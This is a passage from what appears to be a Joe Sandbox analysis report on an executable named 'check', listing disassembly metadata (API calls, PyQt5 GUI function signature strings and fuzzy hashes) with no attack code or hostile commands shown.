                                                                                                                                                                                                                                          • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                          • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$F@@@@Vector@$?append@?$F@@@Polygon
                                                                                                                                                                                                                                          • String ID: QPolygonF$__getitem__
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??_0Vector3$SubtypeType_V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                          • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD4D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD5B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD85
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDF3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                          • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction ID: 21b74e916b27418404fe74aa6627861027182ab41e33872d9d8cc34c75cae120
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B031C522B1AE42D1EF55AB0AA800175A394FF89BB4F894535DD6D06384EFBCE858C220
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?arcPainterPath@@Rect
                                                                                                                                                                                                                                          • String ID: BJ9dd$Bdddddd$QPainterPath$arcTo$arcTo(self, rect: QRectF, startAngle: float, arcLength: float)arcTo(self, x: float, y: float, w: float, h: float, startAngle: float, arcLenght: float)
                                                                                                                                                                                                                                          • API String ID: 1542133116-3728509370
                                                                                                                                                                                                                                          • Opcode ID: 5319ec96415c70251ac436deef4bcca5675b1fa48647c234314b644a8311cc23
                                                                                                                                                                                                                                          • Instruction ID: 8a1b05880903adfd449cff5654deacfbfebd8e595d1be34aca0effbfcab37433
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5319ec96415c70251ac436deef4bcca5675b1fa48647c234314b644a8311cc23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F419637609E85D9DB61CF24E4802DA73A4FB49B88F505226EA8E16B28EF38D155C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FF89D9A1F46
                                                                                                                                                                                                                                          • ?setProperty@QTextFormat@@QEAAXHAEBV?$QVector@VQTextLength@@@@@Z.QT5GUI ref: 00007FF89D9A1FF8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?setFormat@@Property@$Length@@@@@Variant@@@Vector@
                                                                                                                                                                                                                                          • String ID: BiJ1$QTextFormat$setProperty$setProperty(self, propertyId: int, value: Any)setProperty(self, propertyId: int, lengths: Iterable[QTextLength])
                                                                                                                                                                                                                                          • API String ID: 7694866-1449459306
                                                                                                                                                                                                                                          • Opcode ID: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                                          • Instruction ID: 575405354dfed0bc908a2d5fa8d4b4563f8d7ecd7fbb88f984deaf2bb36c1ba2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C041E337A08B4699EB208F61E8842A933B4FB48BD8F444136DA8E53728EF38E455C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPainter@@Rect@@@Window@
                                                                                                                                                                                                                                          • String ID: BJ9$Biiii$QPainter$setWindow$setWindow(self, window: QRect)setWindow(self, x: int, y: int, w: int, h: int)
                                                                                                                                                                                                                                          • API String ID: 3138604205-1220107397
                                                                                                                                                                                                                                          • Opcode ID: a1885867d93b47cf4875c1d273db570ab88a644de17a887dc0b9bf66b035bed6
                                                                                                                                                                                                                                          • Instruction ID: 1b3cb9ca91405680eb64ddfd26471488ae49f82b1a032d08de2c62e313168fdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1885867d93b47cf4875c1d273db570ab88a644de17a887dc0b9bf66b035bed6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92411C36A14B45DAEB20CF64E8802ED37B4F748B98F445136EA8E53B28EF38E155C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?united@QRegion@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D977DED
                                                                                                                                                                                                                                          • ?united@QRegion@@QEBA?AV1@AEBVQRect@@@Z.QT5GUI ref: 00007FF89D977E7B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?united@Region@@$Rect@@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QRegion$united$united(self, r: QRegion) -> QRegionunited(self, r: QRect) -> QRegion
                                                                                                                                                                                                                                          • API String ID: 2920062276-2430780886
                                                                                                                                                                                                                                          • Opcode ID: 30254f61bdaf9620f6fa1fefcb0f257217a149513352d96e5b602bdd75352217
                                                                                                                                                                                                                                          • Instruction ID: 1c4ed651795c48a942843eebc13d2ebc4ef6f8e9b59eaa1a70a686c7e24face1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30254f61bdaf9620f6fa1fefcb0f257217a149513352d96e5b602bdd75352217
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43313A77A09A46C2EB108F15E8892A973E5FB88FD0F514136DA8E47324EF3CE555C748
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FF89D9A7F60
                                                                                                                                                                                                                                          • ?toSubpathPolygons@QPainterPath@@QEBA?AV?$QList@VQPolygonF@@@@AEBVQTransform@@@Z.QT5GUI ref: 00007FF89D9A7F74
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: F@@@@List@PainterPath@@PolygonPolygons@SubpathTransform@@Transform@@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$toSubpathPolygons$toSubpathPolygons(self) -> List[QPolygonF]toSubpathPolygons(self, matrix: QTransform) -> List[QPolygonF]
                                                                                                                                                                                                                                          • API String ID: 4180688332-3469042540
                                                                                                                                                                                                                                          • Opcode ID: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                                          • Instruction ID: 127204c9f1baac20ddb2d32cdfacb956c171ac83a5d5d36a827e58427e7a85b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92311A77A09B8691EB608F11E8497A973A4FB88BD0F904136DACE07364EF3CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2741426602.00007FF7124F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7124F0000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff7124f0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                          • Instruction ID: db0dac8f73c9304e07e878e2cc59948026681ca693816903a774b05ce6441347
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33212F20F0CE4282F9587F215DD2539E2525F547B0F9447B4D97E46AC6FDACB848C324
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FromLongLong_Paint$?metric@DeviceDevice@@@Metric@Writer@@
                                                                                                                                                                                                                                          • String ID: QPdfWriter$metric$metric(self, id: QPaintDevice.PaintDeviceMetric) -> int
                                                                                                                                                                                                                                          • API String ID: 2149383509-2999193365
                                                                                                                                                                                                                                          • Opcode ID: 5450896938b0e26065c9b9476519b2e35fdad20138a9f76ad80961a47039fafb
                                                                                                                                                                                                                                          • Instruction ID: b3f7d71dbe203ea3deaaaa8b0a50a6455d545416bce8790473937ed006ede4e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5450896938b0e26065c9b9476519b2e35fdad20138a9f76ad80961a47039fafb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24212972A09B4692EA608B24E84426A73E4FF94FC4F444032DACE47728EF3CE559CB04
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?columnCount@QStandardItem@@QEBAHXZ.QT5GUI ref: 00007FF89D9B9E8D
                                                                                                                                                                                                                                          • ?insertColumn@QStandardItem@@QEAAXHAEBV?$QList@PEAVQStandardItem@@@@@Z.QT5GUI ref: 00007FF89D9B9E9B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$Item@@$?column?insertColumn@Count@Item@@@@@List@
                                                                                                                                                                                                                                          • String ID: BJ3$QStandardItem$appendColumn$appendColumn(self, items: Iterable[QStandardItem])
                                                                                                                                                                                                                                          • API String ID: 777265572-158524329
                                                                                                                                                                                                                                          • Opcode ID: b18bc6e56fcfe81e740bf3d6c3c9bce3759d0dcafe751d70f76175a283bc9387
                                                                                                                                                                                                                                          • Instruction ID: ec0f7ef17b5217696d136333febb3a046cc43d607e97fa59595c07f8a793705d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18bc6e56fcfe81e740bf3d6c3c9bce3759d0dcafe751d70f76175a283bc9387
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5421D336A18B46C1EB20CF15E8891A973A4FB48BD0F954036DA8E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?fontArray@@ByteDeallocFont@@Table@malloc
                                                                                                                                                                                                                                          • String ID: BAA$QRawFont$fontTable$fontTable(self, tagName: Optional[str]) -> QByteArray
                                                                                                                                                                                                                                          • API String ID: 1726220005-2053224348
                                                                                                                                                                                                                                          • Opcode ID: bcc31e09bf7598181bad2e485e24fd008a4a04f0b90e57349ef5f2ab35689a14
                                                                                                                                                                                                                                          • Instruction ID: d5692b8c2f8885fd0c91ca825e839a17f325159b80cb7abddd444db7c4994499
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcc31e09bf7598181bad2e485e24fd008a4a04f0b90e57349ef5f2ab35689a14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18213437A18B42C2EB109F21E8892A933A4FB49FD0F914036DA9E07320EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setBottomBorderStyle$setBottomBorderStyle(self, style: QTextFrameFormat.BorderStyle)
                                                                                                                                                                                                                                          • API String ID: 3865857979-749793529
                                                                                                                                                                                                                                          • Opcode ID: 1b3cd66d7d44c6d710f23b1436ef361efe9dc671ebf86cae3c94cc67b7c205af
                                                                                                                                                                                                                                          • Instruction ID: 807bee94f0d580af617d05f9594375b201126fbbc8241b79afc72fa80f1ea896
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b3cd66d7d44c6d710f23b1436ef361efe9dc671ebf86cae3c94cc67b7c205af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21D876A08B4AD1DB208F11E8896A933B5FB48BC4F914132DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setVerticalAlignment$setVerticalAlignment(self, alignment: QTextCharFormat.VerticalAlignment)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1378512481
                                                                                                                                                                                                                                          • Opcode ID: f44b947a8ce71afce25c5a7436529b457ef969646bae7b1d33942d57e0d5f1b2
                                                                                                                                                                                                                                          • Instruction ID: 609ff2d4c7f6abca00ea437690c61653c6fe0b564c9d992f4423e9decb5a02c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f44b947a8ce71afce25c5a7436529b457ef969646bae7b1d33942d57e0d5f1b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1221D536A08B4AD1DB208F15E8896A933B5FB48BC4F914132DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextBlockFormat$setMarker$setMarker(self, marker: QTextBlockFormat.MarkerType)
                                                                                                                                                                                                                                          • API String ID: 3865857979-509391100
                                                                                                                                                                                                                                          • Opcode ID: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                                          • Instruction ID: 6adb6f065db470752b733115d649c9772b40b59b7a3f88ae2ad4dcb201c4c10d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7421D876A08B4A91DB208F11E88969933B5FB88B84F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextListFormat$setIndent$setIndent(self, aindent: int)
                                                                                                                                                                                                                                          • API String ID: 3865857979-710005523
                                                                                                                                                                                                                                          • Opcode ID: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                                          • Instruction ID: de113f3a30662097928e30cbb01cd5027739ab103949cb5d7dac2a6923236556
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b1b2598b4ac7f4a60d9972e120959c20390d7c61434238d4b8205b06ad799b2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF21D836A08A4AD1DB208F11E8896A933B4FB44B84F914132DA8E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$setTopPadding$setTopPadding(self, padding: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3595128491
                                                                                                                                                                                                                                          • Opcode ID: d3891ad137e822466d355ab0cffaebd5e522a381466b8eb74b7328b3941a8f6b
                                                                                                                                                                                                                                          • Instruction ID: 0128e1a1783803806c2afbe27c7669d75869894cb89dafc69fdfae1e6284bf04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3891ad137e822466d355ab0cffaebd5e522a381466b8eb74b7328b3941a8f6b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD210836A08F4AD1DB20CF11E8892A933B4FB48B84F914032DA8E43720EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontLetterSpacing$setFontLetterSpacing(self, spacing: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3956914650
                                                                                                                                                                                                                                          • Opcode ID: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                                          • Instruction ID: 59956cd97f430ddbd10e703a69d5adc66ad297f38fa1bf58f068bf31e6c2abe4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e93a46e6a36499635e740c363fda9e76055aff7ff949dce43fbac55766585c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D721C937A08A4AD1DB209F55E8496A933B4FB44BC4F914032DA9E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextFrameFormat$setBottomMargin$setBottomMargin(self, amargin: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-2163814367
                                                                                                                                                                                                                                          • Opcode ID: 64376a5654d37f42cdbf2a795e2367e53644ca3ff5af00d29b822d0bab6e3117
                                                                                                                                                                                                                                          • Instruction ID: 922020f64159ef4571cfcbbcdbef5ac2eda4e93bcdb20de55ca561db2b9c008a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64376a5654d37f42cdbf2a795e2367e53644ca3ff5af00d29b822d0bab6e3117
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26210837A08A4AD1DB20CF11E8892A933B4FB94B84F954032DA8E43724EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontWeight$setFontWeight(self, weight: int)
                                                                                                                                                                                                                                          • API String ID: 3865857979-3382922237
                                                                                                                                                                                                                                          • Opcode ID: 8837edfb63019293a37ed6c1486ecc3e407133392b1c59ee9fcad12f78ef9f42
                                                                                                                                                                                                                                          • Instruction ID: 9436ab7bfda486848e036ffbddbb6ccca6e418adffde81b3d3379ae857d4f379
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8837edfb63019293a37ed6c1486ecc3e407133392b1c59ee9fcad12f78ef9f42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4721DB36A08A4AD1DB20CF15E8896A933B5FB48BC4F914132DA9E43724EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setFontWordSpacing$setFontWordSpacing(self, spacing: float)
                                                                                                                                                                                                                                          • API String ID: 3865857979-1011998758
                                                                                                                                                                                                                                          • Opcode ID: a145a8973ecd7916349f97ad2da27fabe66d3c89dc940e277f96f4bf9d252475
                                                                                                                                                                                                                                          • Instruction ID: 64ac08c3d52ad730fe30e1e934c65f2d2e30ef370b04785ab9b53be1f43d0b8f
